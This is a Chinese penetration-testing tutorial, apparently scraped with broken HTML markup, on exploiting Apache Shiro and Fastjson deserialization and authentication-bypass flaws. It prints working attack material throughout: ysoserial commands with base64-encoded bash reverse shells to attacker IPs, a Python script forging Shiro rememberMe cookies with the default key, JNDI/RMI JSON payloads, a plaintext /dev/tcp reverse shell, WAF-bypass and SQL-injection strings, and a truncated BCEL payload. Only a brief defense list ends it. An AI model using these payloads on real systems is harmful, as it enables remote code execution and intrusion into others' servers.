Apache Shiro与Fastjson漏洞整合利用详解<\/h1>

一、Apache Shiro漏洞分析<\/h2>

1.1 Shiro框架概述<\/h3>

Apache Shiro是一个强大且易用的Java安全框架，提供四大核心功能：<\/p>

认证（Authentication）：用户身份识别<\/li>
授权（Authorization）：访问控制<\/li>
会话管理（Session Management）：用户会话管理<\/li>

加密（Cryptography）：数据保护<\/li> <\/ul>

1.2 CVE-2010-3863：认证绕过漏洞<\/h3>

漏洞原理<\/strong>：<\/p>

Shiro 1.1.0以前版本未对URL进行标准化处理<\/li>
攻击者可构造特殊路径绕过权限验证（如\/<\/code>、\/\/<\/code>、\/.\/<\/code>、\/..\/<\/code>等）<\/li> <\/ul> 影响版本<\/strong>：<\/p> Shiro < 1.1.0<\/li> JSecurity 0.9.x<\/li> <\/ul> 复现步骤<\/strong>：<\/p> 访问目标页面（如IP:8080<\/code>）<\/li> 尝试访问受保护路径（如\/admin<\/code>）<\/li> 使用跨目录测试字典fuzz测试<\/li> <\/ol> 1.3 CVE-2016-4437：反序列化漏洞(Shiro550)<\/h3> 漏洞原理<\/strong>：<\/p> Shiro 1.2.4及以前版本中，加密的用户信息序列化后存储在remember-me<\/code> Cookie中<\/li> 攻击者可利用默认密钥伪造Cookie，触发Java反序列化漏洞<\/li> <\/ul> 加密流程<\/strong>：序列化 → AES加密 → Base64编码<\/p> 解密流程<\/strong>： Base64解码 → AES解密 → 反序列化<\/p> 影响版本<\/strong>： Apache Shiro <= 1.2.4<\/p> 检测方法<\/strong>：<\/p> 勾选"记住密码"选项后登录<\/li> 抓包观察：请求包中是否有rememberme<\/code>字段<\/li> 响应包中是否有Set-cookie:rememberMe=deleteMe<\/code>字段<\/li> <\/ul> <\/li> <\/ol> 利用步骤<\/strong>：<\/p> 使用ysoserial<\/code>生成JRMP监听： java -cp ysoserial.jar ysoserial.exploit.JRMPListener 6666<\/span> CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjEyOS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}'<\/span> <\/span><\/span><\/code><\/pre><\/li> 使用shiro-exploit.py<\/code>获取默认key<\/li> 使用shiro.py<\/code>生成payload（需修改key）： import<\/span> sys <\/span><\/span>import<\/span> uuid <\/span><\/span>import<\/span> base64 <\/span><\/span>import<\/span> subprocess <\/span><\/span>from<\/span> Crypto.Cipher import<\/span> AES <\/span><\/span> <\/span><\/span>def<\/span> encode_rememberme<\/span>(command): <\/span><\/span> popen =<\/span> subprocess.<\/span>Popen(['java'<\/span>, '-jar'<\/span>, 'ysoserial-0.0.6-SNAPSHOT-all.jar'<\/span>, 'JRMPClient'<\/span>, command], stdout=<\/span>subprocess.<\/span>PIPE) <\/span><\/span> BS =<\/span> AES.<\/span>block_size <\/span><\/span> pad =<\/span> lambda<\/span> s: s +<\/span> ((BS -<\/span> len(s) %<\/span> BS) *<\/span> chr(BS -<\/span> len(s) %<\/span> BS)).<\/span>encode() <\/span><\/span> key =<\/span> base64.<\/span>b64decode("kPH+bIxk5D2deZiIxcaaaA=="<\/span>) <\/span><\/span> iv =<\/span> uuid.<\/span>uuid4().<\/span>bytes <\/span><\/span> encryptor =<\/span> AES.<\/span>new(key, AES.<\/span>MODE_CBC, iv) <\/span><\/span> file_body =<\/span> pad(popen.<\/span>stdout.<\/span>read()) <\/span><\/span> base64_ciphertext =<\/span> base64.<\/span>b64encode(iv +<\/span> encryptor.<\/span>encrypt(file_body)) <\/span><\/span> return<\/span> base64_ciphertext <\/span><\/span> <\/span><\/span>if<\/span> __name__ ==<\/span> '__main__'<\/span>: <\/span><\/span> payload =<\/span> encode_rememberme(sys.<\/span>argv[1<\/span>]) <\/span><\/span>print("rememberMe=<\/span>{0}<\/span>"<\/span>.<\/span>format(payload.<\/span>decode())) <\/span><\/span><\/code><\/pre><\/li> 替换数据包中的Cookie值为生成的rememberMe<\/code><\/li> <\/ol> 1.4 CVE-2020-1957：认证绕过漏洞<\/h3> 漏洞原理<\/strong>：<\/p> Shiro与Spring Boot对URL解析不一致<\/li> 攻击者可构造特殊URL绕过Shiro校验<\/li> <\/ul> 影响版本<\/strong>： Apache Shiro < 1.5.2<\/p> 复现方法<\/strong>：<\/p> 原始URL：\/admin<\/code>（跳转到登录页面）<\/li> 绕过URL：\/xxx\/...;\/admin\/<\/code><\/li> <\/ul> 1.5 CVE-2019-12422(Shiro721)<\/h3> 环境搭建<\/strong>：<\/p> git clone https:\/\/github.com\/3ndz\/Shiro-721.git <\/span><\/span>cd Shiro-721\/Docker <\/span><\/span>docker build -t shiro-721 . <\/span><\/span>docker run -p 8080:8080 -d shiro-721 <\/span><\/span><\/code><\/pre>检测方法<\/strong>：<\/p> 观察响应包中的rememberMe=deleteMe<\/code>字段<\/li> 使用Burp插件HaE、Logger++查看Shiro指纹<\/li> <\/ul> 二、Fastjson漏洞分析<\/h2> 2.1 Fastjson概述<\/h3> Fastjson是阿里巴巴的开源JSON解析库，主要功能：<\/p> 将Java Bean序列化为JSON字符串<\/li> 从JSON字符串反序列化到JavaBean<\/li> <\/ul> 2.2 漏洞原理<\/h3> Fastjson的反序列化机制允许通过@type<\/code>指定反序列化类型，当解析恶意构造的JSON数据时，可能调用恶意类或方法，导致RCE。<\/p> 关键概念<\/strong>：<\/p> @type<\/code>字段：指定反序列化时应实例化的类<\/li> JNDI(Java Naming and Directory Interface)：Java命名和目录接口<\/li> RMI(Remote Method Invocation)：远程方法调用<\/li> LDAP(Lightweight Directory Access Protocol)：轻量目录访问协议<\/li> <\/ul> 2.3 JdbcRowSetImpl利用链<\/h3> 利用链流程<\/strong>：<\/p> 设置dataSourceName<\/code>传给lookup<\/code>方法<\/li> 设置autoCommit<\/code>属性触发connect<\/code>函数<\/li> connect<\/code>触发lookup<\/code>函数访问RMI服务<\/li> <\/ol> Exploit示例<\/strong>：<\/p> { <\/span><\/span> "@type"<\/span>:"com.sun.rowset.JdbcRowSetImpl"<\/span>, <\/span><\/span> "dataSourceName"<\/span>:"rmi:\/\/192.168.17.39:9999\/Exploit"<\/span>, <\/span><\/span> "autoCommit"<\/span>:true<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>2.4 版本探测方法<\/h3> 使用dnslog外带<\/li> 通过报错信息判断版本<\/li> 使用脚本快速探测版本<\/li> <\/ol> 2.5 CVE-2017-18349 (Fastjson 1.2.24 RCE)<\/h3> 影响版本<\/strong>： Fastjson <= 1.2.24<\/p> 环境搭建<\/strong>：<\/p> cd \/vulhub\/fastjson\/1.2.24-rce <\/span><\/span>docker-compose up -d <\/span><\/span><\/code><\/pre>复现步骤<\/strong>：<\/p> 准备JDK 8环境<\/li> 安装Maven：apt-get install maven<\/code><\/li> 安装marshalsec： git clone https:\/\/github.com\/mbechler\/marshalsec <\/span><\/span>cd marshalsec <\/span><\/span>mvn clean package -DskipTests <\/span><\/span><\/code><\/pre><\/li> 启动RMI服务： java -cp fastjson_tool.jar fastjson.HRMIServer 192.168.200.159 9999<\/span> "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4xNjAvODg4OCAwPiYx}|{base64,-d}|{bash,-i}"<\/span> <\/span><\/span><\/code><\/pre><\/li> 发送攻击payload： python.exe fastjson-1.2.24_rce.py http:\/\/192.168.200.166:8090 rmi:\/\/192.168.200.159:9999\/Object <\/span><\/span><\/code><\/pre><\/li> <\/ol> 2.6 CNVD-2019-22238 (Fastjson 1.2.47 RCE)<\/h3> 影响版本<\/strong>： Fastjson < 1.2.48<\/p> Payload结构<\/strong>：<\/p> { <\/span><\/span> "a"<\/span>: { <\/span><\/span> "@type"<\/span>: "java.lang.Class"<\/span>, <\/span><\/span> "val"<\/span>: "com.sun.rowset.JdbcRowSetImpl"<\/span> <\/span><\/span> }, <\/span><\/span> "b"<\/span>: { <\/span><\/span> "@type"<\/span>: "com.sun.rowset.JdbcRowSetImpl"<\/span>, <\/span><\/span> "dataSourceName"<\/span>: "rmi:\/\/attacker_ip:9999\/Exploit"<\/span>, <\/span><\/span> "autoCommit"<\/span>: true<\/span> <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>三、WAF绕过技术<\/h2> 3.1 通用绕过方法<\/h3> 跳过参数验证<\/strong>：<\/p> PHP：?%20testid=select 1,2,3<\/code><\/li> ASP：?%testid=select 1,2,3<\/code><\/li> <\/ul> <\/li> 格式错误的HTTP请求<\/strong>：如将GET改为HELLO<\/p> <\/li> HTTP参数污染<\/strong>：test=select 1&select 2,3 from tables<\/code><\/p> <\/li> 双重URL编码<\/strong>：s → %73 → %25%37%33<\/code><\/p> <\/li> 特殊语法<\/strong>：<\/p> or<\/span> 9<\/span>=<\/span>9<\/span> <\/span><\/span>or<\/span> 0<\/span>x47 =<\/span> 0<\/span>x47 <\/span><\/span>or<\/span> char(32<\/span>) =<\/span> ''<\/span> <\/span><\/span>or<\/span> 9<\/span> is<\/span> not<\/span> null<\/span> <\/span><\/span>1<\/span>\/*union*\/<\/span>union<\/span>\/*select*\/<\/span>select<\/span>+<\/span>1<\/span>,2<\/span>,3<\/span>\/* <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ol> 3.2 Fastjson WAF绕过<\/h3> 编码绕过<\/strong>：<\/p> { <\/span><\/span> "\x40\u0074\u0079\u0070\u0065"<\/span>:"com.sun.rowset.JdbcRowSetImpl"<\/span>, <\/span><\/span> "dataSourceName"<\/span>:"rmi:\/\/127.0.0.1:1099\/Exploit"<\/span>, <\/span><\/span> "autoCommit"<\/span>:true<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> 特殊字符绕过<\/strong>：<\/p> _<\/code>和-<\/code>会被替换为空<\/li> 示例：'d_a_t_aSourceName'<\/code><\/li> <\/ul> <\/li> 超大请求包<\/strong>：<\/p> { <\/span><\/span> "@type"<\/span>:"org.example.User"<\/span>, <\/span><\/span> "username"<\/span>:"1"<\/span>, <\/span><\/span> "f"<\/span>:"a*20000"<\/span> \/\/2万个a <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> 空格与特殊字符<\/strong>：<\/p> Fastjson会去除键、值外的空格、\b<\/code>、\n<\/code>、\r<\/code>、\f<\/code>等<\/li> 示例： {\/*s6*\/<\/span>"@type"<\/span>:"com.sun.rowset.JdbcRowSetImpl"<\/span>} <\/span><\/span>{\n<\/span>"@type"<\/span>:"com.sun.rowset.JdbcRowSetImpl"<\/span>} <\/span><\/span>{"@type"<\/span>\b<\/span>:"com.sun.rowset.JdbcRowSetImpl"<\/span>} <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> 3.3 Shiro WAF绕过<\/h3> 协议转换<\/strong>：尝试POST请求<\/li> 请求方法修改<\/strong>：如将GET替换为LOL<\/li> 特殊字符<\/strong>：利用Host回车、TAB等<\/li> <\/ol> 四、不出网利用技术<\/h2> 4.1 判断不出网<\/h3> 测试方法<\/strong>：<\/p> 执行curl http:\/\/xxx.ceye.io<\/code><\/li> 尝试反弹shell：bash -i >& \/dev\/tcp\/192.168.31.143\/222 0>&1<\/code><\/li> <\/ul> <\/li> 结果分析<\/strong>：<\/p> 只有DNS有回显，没有HTTP回显 → 可能不出网<\/li> 未接收到反弹shell → 可能不出网<\/li> <\/ul> <\/li> <\/ol> 4.2 不出网利用方法<\/h3> Tomcat BECL Payload<\/strong>： { <\/span><\/span> "name"<\/span>: { <\/span><\/span> "@type"<\/span>: "java.lang.Class"<\/span>, <\/span><\/span> "val"<\/span>: "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"<\/span> <\/span><\/span> }, <\/span><\/span> "x"<\/span>: { <\/span><\/span> "name"<\/span>: { <\/span><\/span> "@type"<\/span>: "java.lang.Class"<\/span>, <\/span><\/span> "val"<\/span>: "com.sun.org.apache.bcel.internal.util.ClassLoader"<\/span> <\/span><\/span> }, <\/span><\/span> "y"<\/span>: { <\/span><\/span> "@type"<\/span>: "com.alibaba.fastjson.JSONObject"<\/span>, <\/span><\/span> "c"<\/span>: { <\/span><\/span> "@type"<\/span>: "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"<\/span>, <\/span><\/span> "driverClassLoader"<\/span>: { <\/span><\/span> "@type"<\/span>: "com.sun.org.apache.bcel.internal.util.ClassLoader"<\/span> <\/span><\/span> }, <\/span><\/span> "driverClassName"<\/span>: "<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> \[BCEL \]<\/span><\/p> $l$<\/span>8b$I$A$A$A$A$A$A$<\/span>A", "$ref": "$<\/span>.x.y.c.connection" } } } }<\/p> 2. **BCEL类加载**： - 准备恶意Java类并编译 - 使用`com.sun.org.apache.bcel.internal.classfile.Utility`编码class文件 - 生成BCEL格式的payload 3. **内存马注入**： - 使用工具如`fastjson-exp`注入内存马 - 实现命令回显功能 ### 4.3 内网探测利用curl实现SSRF探测： ```bash curl -G -d 'user=marry' -d 'count=2' http:\/\/192.168.31.143:222 curl -b 'foo1=bar;foo2=bar2' http:\/\/192.168.31.143:222 curl -d 'login=admin＆password=pass' -X POST http:\/\/192.168.31.143:222 <\/code><\/pre> 五、防御建议<\/h2> Shiro防御<\/strong>：<\/p> 升级到最新版本<\/li> 修改默认密钥<\/li> 禁用rememberMe功能（如不需要）<\/li> <\/ul> <\/li> Fastjson防御<\/strong>：<\/p> 升级到最新安全版本<\/li> 关闭autotype功能<\/li> 使用安全模式（SafeMode）<\/li> <\/ul> <\/li> 通用防御<\/strong>：<\/p> 部署WAF并定期更新规则<\/li> 限制反序列化操作<\/li> 实施最小权限原则<\/li> <\/ul> <\/li> <\/ol>